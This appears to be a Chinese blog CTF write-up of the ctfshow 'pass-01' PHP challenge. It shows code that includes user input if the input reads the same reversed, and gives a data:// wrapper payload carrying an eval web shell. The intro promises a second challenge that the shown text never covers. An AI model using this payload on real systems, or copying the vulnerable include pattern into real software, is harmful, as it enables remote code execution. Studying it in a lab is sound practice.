ctfshow单身狗 -- web

PHP安全漏洞与绕过技巧
本文探讨了两道PHP安全题目,涉及strrev函数的等价比较和escapeshellcmd函数的过滤限制。在签到题pass-01中,通过data://伪协议和PHP注释语法构造payload绕过;在pass-02中,利用sed命令删除escapeshell限制并替换shell_exec为system。这些技巧展示了PHP安全防护的潜在弱点。

pass-01 web签到

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

看到入参file 判断项是 strrev(反转)==正常入参

刚开始考虑过弱等于绕过,但是include没啥用,

后来了解到  2个知识点,,

1.第一可以利用 data://伪协议,

2.php ?>后的内容不再进行运算

所以可以构造如下:

file=data://text/plain,<?php eval($_REQUEST[1]);?>

通过py反转构造完整payload

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值